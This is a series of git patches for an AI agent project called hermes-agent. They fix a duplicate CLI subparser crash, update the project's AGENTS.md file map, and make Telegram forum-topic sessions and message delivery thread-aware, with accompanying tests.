+            print(color(f"  {pinfo['label']}", Colors.BOLD) + color(f"  ({count}/{total})", Colors.DIM))
+            if enabled:
                 for ts_key in sorted(enabled):
                     label = next((l for k, l, _ in CONFIGURABLE_TOOLSETS if k == ts_key), ts_key)
-                    labels.append(label)
-                enabled_label = ", ".join(labels)
-            print(color(f"- {pinfo['label']}: {enabled_label}", Colors.DIM))
+                    print(color(f"    ✓ {label}", Colors.GREEN))
+            else:
+                print(color("    (none enabled)", Colors.DIM))
         print()
         return
     print(color("⚕ Hermes Tool Configuration", Colors.CYAN, Colors.BOLD))

From ae1c11c5a512be58c64ce31c2213c2c9ee5079bb Mon Sep 17 00:00:00 2001
From: Bartok Moltbot <bartokmoltbot@Alices-MacBook-Pro-4.local>
Date: Wed, 11 Mar 2026 03:33:27 -0400
Subject: [PATCH 057/105] fix(cli): resolve duplicate 'skills' subparser crash
 on Python 3.11+
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Fixes #898 — Python 3.11 changed argparse to raise an exception on
duplicate subparser names (CPython #94331). The 'skills' name was
registered twice: once for Skills Hub and once for skills config.

Changes:
- Remove duplicate 'skills' subparser registration
- Add 'config' as a sub-action under the existing 'hermes skills' command
- Route 'hermes skills config' to skills_config module
- Add regression test to catch future duplicates

Migration: 'hermes skills' (config) is now 'hermes skills config'
---
 hermes_cli/main.py                        | 29 ++++++++-----------
 tests/hermes_cli/test_skills_subparser.py | 35 +++++++++++++++++++++++
 2 files changed, 47 insertions(+), 17 deletions(-)
 create mode 100644 tests/hermes_cli/test_skills_subparser.py

diff --git a/hermes_cli/main.py b/hermes_cli/main.py
index 62497ded..480aba7b 100644
--- a/hermes_cli/main.py
+++ b/hermes_cli/main.py
@@ -2252,8 +2252,8 @@ For more help on a command:
     # =========================================================================
     skills_parser = subparsers.add_parser(
         "skills",
-        help="Skills Hub — search, install, and manage skills from online registries",
-        description="Search, install, inspect, audit, and manage skills from GitHub, ClawHub, and other registries."
+        help="Search, install, configure, and manage skills",
+        description="Search, install, inspect, audit, configure, and manage skills from GitHub, ClawHub, and other registries."
     )
     skills_subparsers = skills_parser.add_subparsers(dest="skills_action")
 
@@ -2307,9 +2307,17 @@ For more help on a command:
     tap_rm = tap_subparsers.add_parser("remove", help="Remove a tap")
     tap_rm.add_argument("name", help="Tap name to remove")
 
+    # config sub-action: interactive enable/disable
+    skills_subparsers.add_parser("config", help="Interactive skill configuration — enable/disable individual skills")
+
     def cmd_skills(args):
-        from hermes_cli.skills_hub import skills_command
-        skills_command(args)
+        # Route 'config' action to skills_config module
+        if getattr(args, 'skills_action', None) == 'config':
+            from hermes_cli.skills_config import skills_command as skills_config_command
+            skills_config_command(args)
+        else:
+            from hermes_cli.skills_hub import skills_command
+            skills_command(args)
 
     skills_parser.set_defaults(func=cmd_skills)
 
@@ -2332,19 +2340,6 @@ For more help on a command:
         tools_command(args)
 
     tools_parser.set_defaults(func=cmd_tools)
-
-    # =========================================================================
-    # skills command
-    # =========================================================================
-    skills_parser = subparsers.add_parser(
-        "skills",
-        help="Configure which skills are enabled",
-        description="Interactive skill configuration — enable/disable individual skills."
-    )
-    def cmd_skills(args):
-        from hermes_cli.skills_config import skills_command
-        skills_command(args)
-    skills_parser.set_defaults(func=cmd_skills)
     # =========================================================================
     # sessions command
     # =========================================================================
diff --git a/tests/hermes_cli/test_skills_subparser.py b/tests/hermes_cli/test_skills_subparser.py
new file mode 100644
index 00000000..d2b89ed3
--- /dev/null
+++ b/tests/hermes_cli/test_skills_subparser.py
@@ -0,0 +1,35 @@
+"""Test that skills subparser doesn't conflict (regression test for #898)."""
+
+import argparse
+
+
+def test_no_duplicate_skills_subparser():
+    """Ensure 'skills' subparser is only registered once to avoid Python 3.11+ crash.
+
+    Python 3.11 changed argparse to raise an exception on duplicate subparser
+    names instead of silently overwriting (see CPython #94331).
+
+    This test will fail with:
+        argparse.ArgumentError: argument command: conflicting subparser: skills
+
+    if the duplicate 'skills' registration is reintroduced.
+    """
+    # Force fresh import of the module where parser is constructed
+    # If there are duplicate 'skills' subparsers, this import will raise
+    # argparse.ArgumentError at module load time
+    import importlib
+    import sys
+
+    # Remove cached module if present
+    if 'hermes_cli.main' in sys.modules:
+        del sys.modules['hermes_cli.main']
+
+    try:
+        import hermes_cli.main  # noqa: F401
+    except argparse.ArgumentError as e:
+        if "conflicting subparser" in str(e):
+            raise AssertionError(
+                f"Duplicate subparser detected: {e}. "
+                "See issue #898 for details."
+            ) from e
+        raise

From fbfdde496bbea52e66f1a6f5c22815dafb3b4f28 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 00:54:49 -0700
Subject: [PATCH 058/105] docs: update AGENTS.md with new files and test count
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

- Add hermes_cli/ files: skills_config, tools_config, skills_hub, models, auth
- Add acp_adapter/ directory
- Update test count: ~2500 → ~3000 (~3 min runtime)
---
 AGENTS.md | 12 +++++++++---
 1 file changed, 9 insertions(+), 3 deletions(-)

diff --git a/AGENTS.md b/AGENTS.md
index 21ad08a9..e52a4f8c 100644
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -32,7 +32,12 @@ hermes-agent/
 │   ├── commands.py       # Slash command definitions + SlashCommandCompleter
 │   ├── callbacks.py      # Terminal callbacks (clarify, sudo, approval)
 │   ├── setup.py          # Interactive setup wizard
-│   └── skin_engine.py    # Skin/theme engine — CLI visual customization
+│   ├── skin_engine.py    # Skin/theme engine — CLI visual customization
+│   ├── skills_config.py  # `hermes skills` — enable/disable skills per platform
+│   ├── tools_config.py   # `hermes tools` — enable/disable tools per platform
+│   ├── skills_hub.py     # `/skills` slash command (search, browse, install)
+│   ├── models.py         # Model catalog, provider model lists
+│   └── auth.py           # Provider credential resolution
 ├── tools/                # Tool implementations (one file per tool)
 │   ├── registry.py       # Central tool registry (schemas, handlers, dispatch)
 │   ├── approval.py       # Dangerous command detection
@@ -49,9 +54,10 @@ hermes-agent/
 │   ├── run.py            # Main loop, slash commands, message dispatch
 │   ├── session.py        # SessionStore — conversation persistence
 │   └── platforms/        # Adapters: telegram, discord, slack, whatsapp, homeassistant, signal
+├── acp_adapter/          # ACP server (VS Code / Zed / JetBrains integration)
 ├── cron/                 # Scheduler (jobs.py, scheduler.py)
 ├── environments/         # RL training environments (Atropos)
-├── tests/                # Pytest suite (~2500+ tests)
+├── tests/                # Pytest suite (~3000 tests)
 └── batch_runner.py       # Parallel batch processing
 ```
 
@@ -333,7 +339,7 @@ The `_isolate_hermes_home` autouse fixture in `tests/conftest.py` redirects `HER
 
 ```bash
 source .venv/bin/activate
-python -m pytest tests/ -q          # Full suite (~2500 tests, ~2 min)
+python -m pytest tests/ -q          # Full suite (~3000 tests, ~3 min)
 python -m pytest tests/test_model_tools.py -q   # Toolset resolution
 python -m pytest tests/test_cli_init.py -q       # CLI config loading
 python -m pytest tests/gateway/ -q               # Gateway tests

From 0d6b25274c6d3b8b77f8730bff75d046bddcbfff Mon Sep 17 00:00:00 2001
From: SPANISH FLU <mrflu1918@proton.me>
Date: Wed, 11 Mar 2026 09:15:34 +0100
Subject: [PATCH 059/105] fix(gateway): isolate telegram forum topic sessions

---
 cron/scheduler.py                         |  12 +-
 gateway/channel_directory.py              |  31 ++++-
 gateway/delivery.py                       |   9 +-
 gateway/mirror.py                         |  12 +-
 gateway/platforms/base.py                 |   4 +-
 gateway/run.py                            |  17 ++-
 gateway/session.py                        |   2 +
 tests/gateway/test_base_topic_sessions.py | 135 ++++++++++++++++++++++
 tests/gateway/test_channel_directory.py   |  45 ++++++++
 tests/gateway/test_delivery.py            |   5 +-
 tests/gateway/test_mirror.py              |  43 +++++++
 tests/gateway/test_run_progress_topics.py | 134 +++++++++++++++++++++
 tests/gateway/test_session.py             |  11 ++
 tests/gateway/test_session_hygiene.py     | 125 +++++++++++++++++++-
 tests/tools/test_send_message_tool.py     |  67 +++++++++++
 tools/send_message_tool.py                |  50 +++++---
 16 files changed, 663 insertions(+), 39 deletions(-)
 create mode 100644 tests/gateway/test_base_topic_sessions.py
 create mode 100644 tests/gateway/test_run_progress_topics.py
 create mode 100644 tests/tools/test_send_message_tool.py

diff --git a/cron/scheduler.py b/cron/scheduler.py
index a8464cce..d5967d6a 100644
--- a/cron/scheduler.py
+++ b/cron/scheduler.py
@@ -45,7 +45,7 @@ _LOCK_FILE = _LOCK_DIR / ".tick.lock"
 
 
 def _resolve_origin(job: dict) -> Optional[dict]:
-    """Extract origin info from a job, returning {platform, chat_id, chat_name} or None."""
+    """Extract origin info from a job, preserving any extra routing metadata."""
     origin = job.get("origin")
     if not origin:
         return None
@@ -69,6 +69,8 @@ def _deliver_result(job: dict, content: str) -> None:
     if deliver == "local":
         return
 
+    thread_id = None
+
     # Resolve target platform + chat_id
     if deliver == "origin":
         if not origin:
@@ -76,6 +78,7 @@ def _deliver_result(job: dict, content: str) -> None:
             return
         platform_name = origin["platform"]
         chat_id = origin["chat_id"]
+        thread_id = origin.get("thread_id")
     elif ":" in deliver:
         platform_name, chat_id = deliver.split(":", 1)
     else:
@@ -83,6 +86,7 @@ def _deliver_result(job: dict, content: str) -> None:
         platform_name = deliver
         if origin and origin.get("platform") == platform_name:
             chat_id = origin["chat_id"]
+            thread_id = origin.get("thread_id")
         else:
             # Fall back to home channel
             chat_id = os.getenv(f"{platform_name.upper()}_HOME_CHANNEL", "")
@@ -118,13 +122,13 @@ def _deliver_result(job: dict, content: str) -> None:
 
     # Run the async send in a fresh event loop (safe from any thread)
     try:
-        result = asyncio.run(_send_to_platform(platform, pconfig, chat_id, content))
+        result = asyncio.run(_send_to_platform(platform, pconfig, chat_id, content, thread_id=thread_id))
     except RuntimeError:
         # asyncio.run() fails if there's already a running loop in this thread;
         # spin up a new thread to avoid that.
         import concurrent.futures
         with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
-            future = pool.submit(asyncio.run, _send_to_platform(platform, pconfig, chat_id, content))
+            future = pool.submit(asyncio.run, _send_to_platform(platform, pconfig, chat_id, content, thread_id=thread_id))
             result = future.result(timeout=30)
     except Exception as e:
         logger.error("Job '%s': delivery to %s:%s failed: %s", job["id"], platform_name, chat_id, e)
@@ -137,7 +141,7 @@ def _deliver_result(job: dict, content: str) -> None:
         # Mirror the delivered content into the target's gateway session
         try:
             from gateway.mirror import mirror_to_session
-            mirror_to_session(platform_name, chat_id, content, source_label="cron")
+            mirror_to_session(platform_name, chat_id, content, source_label="cron", thread_id=thread_id)
         except Exception as e:
             logger.warning("Job '%s': mirror_to_session failed: %s", job["id"], e)
 
diff --git a/gateway/channel_directory.py b/gateway/channel_directory.py
index 31406a7d..858859fd 100644
--- a/gateway/channel_directory.py
+++ b/gateway/channel_directory.py
@@ -17,6 +17,26 @@ logger = logging.getLogger(__name__)
 DIRECTORY_PATH = Path.home() / ".hermes" / "channel_directory.json"
 
 
+def _session_entry_id(origin: Dict[str, Any]) -> Optional[str]:
+    chat_id = origin.get("chat_id")
+    if not chat_id:
+        return None
+    thread_id = origin.get("thread_id")
+    if thread_id:
+        return f"{chat_id}:{thread_id}"
+    return str(chat_id)
+
+
+def _session_entry_name(origin: Dict[str, Any]) -> str:
+    base_name = origin.get("chat_name") or origin.get("user_name") or str(origin.get("chat_id"))
+    thread_id = origin.get("thread_id")
+    if not thread_id:
+        return base_name
+
+    topic_label = origin.get("chat_topic") or f"topic {thread_id}"
+    return f"{base_name} / {topic_label}"
+
+
 # ---------------------------------------------------------------------------
 # Build / refresh
 # ---------------------------------------------------------------------------
@@ -123,14 +143,15 @@ def _build_from_sessions(platform_name: str) -> List[Dict[str, str]]:
             origin = session.get("origin") or {}
             if origin.get("platform") != platform_name:
                 continue
-            chat_id = origin.get("chat_id")
-            if not chat_id or chat_id in seen_ids:
+            entry_id = _session_entry_id(origin)
+            if not entry_id or entry_id in seen_ids:
                 continue
-            seen_ids.add(chat_id)
+            seen_ids.add(entry_id)
             entries.append({
-                "id": str(chat_id),
-                "name": origin.get("chat_name") or origin.get("user_name") or str(chat_id),
+                "id": entry_id,
+                "name": _session_entry_name(origin),
                 "type": session.get("chat_type", "dm"),
+                "thread_id": origin.get("thread_id"),
             })
     except Exception as e:
         logger.debug("Channel directory: failed to read sessions for %s: %s", platform_name, e)
diff --git a/gateway/delivery.py b/gateway/delivery.py
index 0093c1fb..5bcd58f4 100644
--- a/gateway/delivery.py
+++ b/gateway/delivery.py
@@ -37,6 +37,7 @@ class DeliveryTarget:
     """
     platform: Platform
     chat_id: Optional[str] = None  # None means use home channel
+    thread_id: Optional[str] = None
     is_origin: bool = False
     is_explicit: bool = False  # True if chat_id was explicitly specified
     
@@ -58,6 +59,7 @@ class DeliveryTarget:
                 return cls(
                     platform=origin.platform,
                     chat_id=origin.chat_id,
+                    thread_id=origin.thread_id,
                     is_origin=True,
                 )
             else:
@@ -150,7 +152,7 @@ class DeliveryRouter:
                     continue
             
             # Deduplicate
-            key = (target.platform, target.chat_id)
+            key = (target.platform, target.chat_id, target.thread_id)
             if key not in seen_platforms:
                 seen_platforms.add(key)
                 targets.append(target)
@@ -285,7 +287,10 @@ class DeliveryRouter:
                 + f"\n\n... [truncated, full output saved to {saved_path}]"
             )
         
-        return await adapter.send(target.chat_id, content, metadata=metadata)
+        send_metadata = dict(metadata or {})
+        if target.thread_id and "thread_id" not in send_metadata:
+            send_metadata["thread_id"] = target.thread_id
+        return await adapter.send(target.chat_id, content, metadata=send_metadata or None)
 
 
 def parse_deliver_spec(
diff --git a/gateway/mirror.py b/gateway/mirror.py
index 1fbd55d5..f54e6e1a 100644
--- a/gateway/mirror.py
+++ b/gateway/mirror.py
@@ -26,6 +26,7 @@ def mirror_to_session(
     chat_id: str,
     message_text: str,
     source_label: str = "cli",
+    thread_id: Optional[str] = None,
 ) -> bool:
     """
     Append a delivery-mirror message to the target session's transcript.
@@ -37,9 +38,9 @@ def mirror_to_session(
     All errors are caught -- this is never fatal.
     """
     try:
-        session_id = _find_session_id(platform, str(chat_id))
+        session_id = _find_session_id(platform, str(chat_id), thread_id=thread_id)
         if not session_id:
-            logger.debug("Mirror: no session found for %s:%s", platform, chat_id)
+            logger.debug("Mirror: no session found for %s:%s:%s", platform, chat_id, thread_id)
             return False
 
         mirror_msg = {
@@ -57,11 +58,11 @@ def mirror_to_session(
         return True
 
     except Exception as e:
-        logger.debug("Mirror failed for %s:%s: %s", platform, chat_id, e)
+        logger.debug("Mirror failed for %s:%s:%s: %s", platform, chat_id, thread_id, e)
         return False
 
 
-def _find_session_id(platform: str, chat_id: str) -> Optional[str]:
+def _find_session_id(platform: str, chat_id: str, thread_id: Optional[str] = None) -> Optional[str]:
     """
     Find the active session_id for a platform + chat_id pair.
 
@@ -91,6 +92,9 @@ def _find_session_id(platform: str, chat_id: str) -> Optional[str]:
 
         origin_chat_id = str(origin.get("chat_id", ""))
         if origin_chat_id == str(chat_id):
+            origin_thread_id = origin.get("thread_id")
+            if thread_id is not None and str(origin_thread_id or "") != str(thread_id):
+                continue
             updated = entry.get("updated_at", "")
             if updated > best_updated:
                 best_updated = updated
diff --git a/gateway/platforms/base.py b/gateway/platforms/base.py
index 1e743618..f4ab43ea 100644
--- a/gateway/platforms/base.py
+++ b/gateway/platforms/base.py
@@ -24,7 +24,7 @@ from pathlib import Path as _Path
 sys.path.insert(0, str(_Path(__file__).resolve().parents[2]))
 
 from gateway.config import Platform, PlatformConfig
-from gateway.session import SessionSource
+from gateway.session import SessionSource, build_session_key
 
 
 # ---------------------------------------------------------------------------
@@ -646,7 +646,7 @@ class BasePlatformAdapter(ABC):
         if not self._message_handler:
             return
         
-        session_key = event.source.chat_id
+        session_key = build_session_key(event.source)
         
         # Check if there's already an active handler for this session
         if session_key in self._active_sessions:
diff --git a/gateway/run.py b/gateway/run.py
index be89833a..d2c39e88 100644
--- a/gateway/run.py
+++ b/gateway/run.py
@@ -875,7 +875,6 @@ class GatewayRunner:
             if command in quick_commands:
                 qcmd = quick_commands[command]
                 if qcmd.get("type") == "exec":
-                    import asyncio
                     exec_cmd = qcmd.get("command", "")
                     if exec_cmd:
                         try:
@@ -1067,12 +1066,14 @@ class GatewayRunner:
                     )
 
                     _hyg_adapter = self.adapters.get(source.platform)
+                    _hyg_meta = {"thread_id": source.thread_id} if source.thread_id else None
                     if _hyg_adapter:
                         try:
                             await _hyg_adapter.send(
                                 source.chat_id,
                                 f"🗜️ Session is large ({_msg_count} messages, "
-                                f"~{_approx_tokens:,} tokens). Auto-compressing..."
+                                f"~{_approx_tokens:,} tokens). Auto-compressing...",
+                                metadata=_hyg_meta,
                             )
                         except Exception:
                             pass
@@ -1132,7 +1133,8 @@ class GatewayRunner:
                                             f"🗜️ Compressed: {_msg_count} → "
                                             f"{_new_count} messages, "
                                             f"~{_approx_tokens:,} → "
-                                            f"~{_new_tokens:,} tokens"
+                                            f"~{_new_tokens:,} tokens",
+                                            metadata=_hyg_meta,
                                         )
                                     except Exception:
                                         pass
@@ -1152,7 +1154,8 @@ class GatewayRunner:
                                                 "after compression "
                                                 f"(~{_new_tokens:,} tokens). "
                                                 "Consider using /reset to start "
-                                                "fresh if you experience issues."
+                                                "fresh if you experience issues.",
+                                                metadata=_hyg_meta,
                                             )
                                         except Exception:
                                             pass
@@ -1164,6 +1167,7 @@ class GatewayRunner:
                         # Compression failed and session is dangerously large
                         if _approx_tokens >= _warn_token_threshold:
                             _hyg_adapter = self.adapters.get(source.platform)
+                            _hyg_meta = {"thread_id": source.thread_id} if source.thread_id else None
                             if _hyg_adapter:
                                 try:
                                     await _hyg_adapter.send(
@@ -1173,7 +1177,8 @@ class GatewayRunner:
                                         f"~{_approx_tokens:,} tokens) and "
                                         "auto-compression failed. Consider "
                                         "using /compress or /reset to avoid "
-                                        "issues."
+                                        "issues.",
+                                        metadata=_hyg_meta,
                                     )
                                 except Exception:
                                     pass
@@ -2765,7 +2770,7 @@ class GatewayRunner:
 
                     # Restore typing indicator
                     await asyncio.sleep(0.3)
-                    await adapter.send_typing(source.chat_id)
+                    await adapter.send_typing(source.chat_id, metadata=_progress_metadata)
 
                 except queue.Empty:
                     await asyncio.sleep(0.3)
diff --git a/gateway/session.py b/gateway/session.py
index b1cdefa5..17ca8e4d 100644
--- a/gateway/session.py
+++ b/gateway/session.py
@@ -306,6 +306,8 @@ def build_session_key(source: SessionSource) -> str:
         if platform == "whatsapp" and source.chat_id:
             return f"agent:main:{platform}:dm:{source.chat_id}"
         return f"agent:main:{platform}:dm"
+    if source.thread_id:
+        return f"agent:main:{platform}:{source.chat_type}:{source.chat_id}:{source.thread_id}"
     return f"agent:main:{platform}:{source.chat_type}:{source.chat_id}"
 
 
diff --git a/tests/gateway/test_base_topic_sessions.py b/tests/gateway/test_base_topic_sessions.py
new file mode 100644
index 00000000..e3ca7ae7
--- /dev/null
+++ b/tests/gateway/test_base_topic_sessions.py
@@ -0,0 +1,135 @@
+"""Tests for BasePlatformAdapter topic-aware session handling."""
+
+import asyncio
+from types import SimpleNamespace
+
+import pytest
+
+from gateway.config import Platform, PlatformConfig
+from gateway.platforms.base import BasePlatformAdapter, MessageEvent, SendResult
+from gateway.session import SessionSource, build_session_key
+
+
+class DummyTelegramAdapter(BasePlatformAdapter):
+    def __init__(self):
+        super().__init__(PlatformConfig(enabled=True, token="fake-token"), Platform.TELEGRAM)
+        self.sent = []
+        self.typing = []
+
+    async def connect(self) -> bool:
+        return True
+
+    async def disconnect(self) -> None:
+        return None
+
+    async def send(self, chat_id, content, reply_to=None, metadata=None) -> SendResult:
+        self.sent.append(
+            {
+                "chat_id": chat_id,
+                "content": content,
+                "reply_to": reply_to,
+                "metadata": metadata,
+            }
+        )
+        return SendResult(success=True, message_id="1")
+
+    async def send_typing(self, chat_id: str, metadata=None) -> None:
+        self.typing.append({"chat_id": chat_id, "metadata": metadata})
+        return None
+
+    async def get_chat_info(self, chat_id: str):
+        return {"id": chat_id}
+
+
+def _make_event(chat_id: str, thread_id: str, message_id: str = "1") -> MessageEvent:
+    return MessageEvent(
+        text="hello",
+        source=SessionSource(
+            platform=Platform.TELEGRAM,
+            chat_id=chat_id,
+            chat_type="group",
+            thread_id=thread_id,
+        ),
+        message_id=message_id,
+    )
+
+
+class TestBasePlatformTopicSessions:
+    @pytest.mark.asyncio
+    async def test_handle_message_does_not_interrupt_different_topic(self, monkeypatch):
+        adapter = DummyTelegramAdapter()
+        adapter.set_message_handler(lambda event: asyncio.sleep(0, result=None))
+
+        active_event = _make_event("-1001", "10")
+        adapter._active_sessions[build_session_key(active_event.source)] = asyncio.Event()
+
+        scheduled = []
+
+        def fake_create_task(coro):
+            scheduled.append(coro)
+            coro.close()
+            return SimpleNamespace()
+
+        monkeypatch.setattr(asyncio, "create_task", fake_create_task)
+
+        await adapter.handle_message(_make_event("-1001", "11"))
+
+        assert len(scheduled) == 1
+        assert adapter._pending_messages == {}
+
+    @pytest.mark.asyncio
+    async def test_handle_message_interrupts_same_topic(self, monkeypatch):
+        adapter = DummyTelegramAdapter()
+        adapter.set_message_handler(lambda event: asyncio.sleep(0, result=None))
+
+        active_event = _make_event("-1001", "10")
+        adapter._active_sessions[build_session_key(active_event.source)] = asyncio.Event()
+
+        scheduled = []
+
+        def fake_create_task(coro):
+            scheduled.append(coro)
+            coro.close()
+            return SimpleNamespace()
+
+        monkeypatch.setattr(asyncio, "create_task", fake_create_task)
+
+        pending_event = _make_event("-1001", "10", message_id="2")
+        await adapter.handle_message(pending_event)
+
+        assert scheduled == []
+        assert adapter.get_pending_message(build_session_key(pending_event.source)) == pending_event
+
+    @pytest.mark.asyncio
+    async def test_process_message_background_replies_in_same_topic(self):
+        adapter = DummyTelegramAdapter()
+        typing_calls = []
+
+        async def handler(_event):
+            await asyncio.sleep(0)
+            return "ack"
+
+        async def hold_typing(_chat_id, interval=2.0, metadata=None):
+            typing_calls.append({"chat_id": _chat_id, "metadata": metadata})
+            await asyncio.Event().wait()
+
+        adapter.set_message_handler(handler)
+        adapter._keep_typing = hold_typing
+
+        event = _make_event("-1001", "17585")
+        await adapter._process_message_background(event, build_session_key(event.source))
+
+        assert adapter.sent == [
+            {
+                "chat_id": "-1001",
+                "content": "ack",
+                "reply_to": "1",
+                "metadata": {"thread_id": "17585"},
+            }
+        ]
+        assert typing_calls == [
+            {
+                "chat_id": "-1001",
+                "metadata": {"thread_id": "17585"},
+            }
+        ]
diff --git a/tests/gateway/test_channel_directory.py b/tests/gateway/test_channel_directory.py
index d7562977..9ff8ac97 100644
--- a/tests/gateway/test_channel_directory.py
+++ b/tests/gateway/test_channel_directory.py
@@ -111,6 +111,13 @@ class TestResolveChannelName:
         with self._setup(tmp_path, platforms):
             assert resolve_channel_name("telegram", "nonexistent") is None
 
+    def test_topic_name_resolves_to_composite_id(self, tmp_path):
+        platforms = {
+            "telegram": [{"id": "-1001:17585", "name": "Coaching Chat / topic 17585", "type": "group"}]
+        }
+        with self._setup(tmp_path, platforms):
+            assert resolve_channel_name("telegram", "Coaching Chat / topic 17585") == "-1001:17585"
+
 
 class TestBuildFromSessions:
     def _write_sessions(self, tmp_path, sessions_data):
@@ -169,6 +176,42 @@ class TestBuildFromSessions:
 
         assert len(entries) == 1
 
+    def test_keeps_distinct_topics_with_same_chat_id(self, tmp_path):
+        self._write_sessions(tmp_path, {
+            "group_root": {
+                "origin": {"platform": "telegram", "chat_id": "-1001", "chat_name": "Coaching Chat"},
+                "chat_type": "group",
+            },
+            "topic_a": {
+                "origin": {
+                    "platform": "telegram",
+                    "chat_id": "-1001",
+                    "chat_name": "Coaching Chat",
+                    "thread_id": "17585",
+                },
+                "chat_type": "group",
+            },
+            "topic_b": {
+                "origin": {
+                    "platform": "telegram",
+                    "chat_id": "-1001",
+                    "chat_name": "Coaching Chat",
+                    "thread_id": "17587",
+                },
+                "chat_type": "group",
+            },
+        })
+
+        with patch.object(Path, "home", return_value=tmp_path):
+            entries = _build_from_sessions("telegram")
+
+        ids = {entry["id"] for entry in entries}
+        names = {entry["name"] for entry in entries}
+        assert ids == {"-1001", "-1001:17585", "-1001:17587"}
+        assert "Coaching Chat" in names
+        assert "Coaching Chat / topic 17585" in names
+        assert "Coaching Chat / topic 17587" in names
+
 
 class TestFormatDirectoryForDisplay:
     def test_empty_directory(self, tmp_path):
@@ -181,6 +224,7 @@ class TestFormatDirectoryForDisplay:
             "telegram": [
                 {"id": "123", "name": "Alice", "type": "dm"},
                 {"id": "456", "name": "Dev Group", "type": "group"},
+                {"id": "-1001:17585", "name": "Coaching Chat / topic 17585", "type": "group"},
             ]
         })
         with patch("gateway.channel_directory.DIRECTORY_PATH", cache_file):
@@ -189,6 +233,7 @@ class TestFormatDirectoryForDisplay:
         assert "Telegram:" in result
         assert "telegram:Alice" in result
         assert "telegram:Dev Group" in result
+        assert "telegram:Coaching Chat / topic 17585" in result
 
     def test_discord_grouped_by_guild(self, tmp_path):
         cache_file = _write_directory(tmp_path, {
diff --git a/tests/gateway/test_delivery.py b/tests/gateway/test_delivery.py
index 124dfee7..42eba781 100644
--- a/tests/gateway/test_delivery.py
+++ b/tests/gateway/test_delivery.py
@@ -24,10 +24,11 @@ class TestParseTargetPlatformChat:
         assert target.chat_id is None
 
     def test_origin_with_source(self):
-        origin = SessionSource(platform=Platform.TELEGRAM, chat_id="789")
+        origin = SessionSource(platform=Platform.TELEGRAM, chat_id="789", thread_id="42")
         target = DeliveryTarget.parse("origin", origin=origin)
         assert target.platform == Platform.TELEGRAM
         assert target.chat_id == "789"
+        assert target.thread_id == "42"
         assert target.is_origin is True
 
     def test_origin_without_source(self):
@@ -64,7 +65,7 @@ class TestParseDeliverSpec:
 
 class TestTargetToStringRoundtrip:
     def test_origin_roundtrip(self):
-        origin = SessionSource(platform=Platform.TELEGRAM, chat_id="111")
+        origin = SessionSource(platform=Platform.TELEGRAM, chat_id="111", thread_id="42")
         target = DeliveryTarget.parse("origin", origin=origin)
         assert target.to_string() == "origin"
 
diff --git a/tests/gateway/test_mirror.py b/tests/gateway/test_mirror.py
index 928f4eac..427e720c 100644
--- a/tests/gateway/test_mirror.py
+++ b/tests/gateway/test_mirror.py
@@ -57,6 +57,26 @@ class TestFindSessionId:
 
         assert result == "sess_new"
 
+    def test_thread_id_disambiguates_same_chat(self, tmp_path):
+        sessions_dir, index_file = _setup_sessions(tmp_path, {
+            "topic_a": {
+                "session_id": "sess_topic_a",
+                "origin": {"platform": "telegram", "chat_id": "-1001", "thread_id": "10"},
+                "updated_at": "2026-01-01T00:00:00",
+            },
+            "topic_b": {
+                "session_id": "sess_topic_b",
+                "origin": {"platform": "telegram", "chat_id": "-1001", "thread_id": "11"},
+                "updated_at": "2026-02-01T00:00:00",
+            },
+        })
+
+        with patch.object(mirror_mod, "_SESSIONS_DIR", sessions_dir), \
+             patch.object(mirror_mod, "_SESSIONS_INDEX", index_file):
+            result = _find_session_id("telegram", "-1001", thread_id="10")
+
+        assert result == "sess_topic_a"
+
     def test_no_match_returns_none(self, tmp_path):
         sessions_dir, index_file = _setup_sessions(tmp_path, {
             "sess": {
@@ -146,6 +166,29 @@ class TestMirrorToSession:
         assert msg["mirror"] is True
         assert msg["mirror_source"] == "cli"
 
+    def test_successful_mirror_uses_thread_id(self, tmp_path):
+        sessions_dir, index_file = _setup_sessions(tmp_path, {
+            "topic_a": {
+                "session_id": "sess_topic_a",
+                "origin": {"platform": "telegram", "chat_id": "-1001", "thread_id": "10"},
+                "updated_at": "2026-01-01T00:00:00",
+            },
+            "topic_b": {
+                "session_id": "sess_topic_b",
+                "origin": {"platform": "telegram", "chat_id": "-1001", "thread_id": "11"},
+                "updated_at": "2026-02-01T00:00:00",
+            },
+        })
+
+        with patch.object(mirror_mod, "_SESSIONS_DIR", sessions_dir), \
+             patch.object(mirror_mod, "_SESSIONS_INDEX", index_file), \
+             patch("gateway.mirror._append_to_sqlite"):
+            result = mirror_to_session("telegram", "-1001", "Hello topic!", source_label="cron", thread_id="10")
+
+        assert result is True
+        assert (sessions_dir / "sess_topic_a.jsonl").exists()
+        assert not (sessions_dir / "sess_topic_b.jsonl").exists()
+
     def test_no_matching_session(self, tmp_path):
         sessions_dir, index_file = _setup_sessions(tmp_path, {})
 
diff --git a/tests/gateway/test_run_progress_topics.py b/tests/gateway/test_run_progress_topics.py
new file mode 100644
index 00000000..20ae712a
--- /dev/null
+++ b/tests/gateway/test_run_progress_topics.py
@@ -0,0 +1,134 @@
+"""Tests for topic-aware gateway progress updates."""
+
+import importlib
+import sys
+import time
+import types
+from types import SimpleNamespace
+
+import pytest
+
+from gateway.config import Platform, PlatformConfig
+from gateway.platforms.base import BasePlatformAdapter, SendResult
+from gateway.session import SessionSource
+
+
+class ProgressCaptureAdapter(BasePlatformAdapter):
+    def __init__(self):
+        super().__init__(PlatformConfig(enabled=True, token="fake-token"), Platform.TELEGRAM)
+        self.sent = []
+        self.edits = []
+        self.typing = []
+
+    async def connect(self) -> bool:
+        return True
+
+    async def disconnect(self) -> None:
+        return None
+
+    async def send(self, chat_id, content, reply_to=None, metadata=None) -> SendResult:
+        self.sent.append(
+            {
+                "chat_id": chat_id,
+                "content": content,
+                "reply_to": reply_to,
+                "metadata": metadata,
+            }
+        )
+        return SendResult(success=True, message_id="progress-1")
+
+    async def edit_message(self, chat_id, message_id, content) -> SendResult:
+        self.edits.append(
+            {
+                "chat_id": chat_id,
+                "message_id": message_id,
+                "content": content,
+            }
+        )
+        return SendResult(success=True, message_id=message_id)
+
+    async def send_typing(self, chat_id, metadata=None) -> None:
+        self.typing.append({"chat_id": chat_id, "metadata": metadata})
+
+    async def get_chat_info(self, chat_id: str):
+        return {"id": chat_id}
+
+
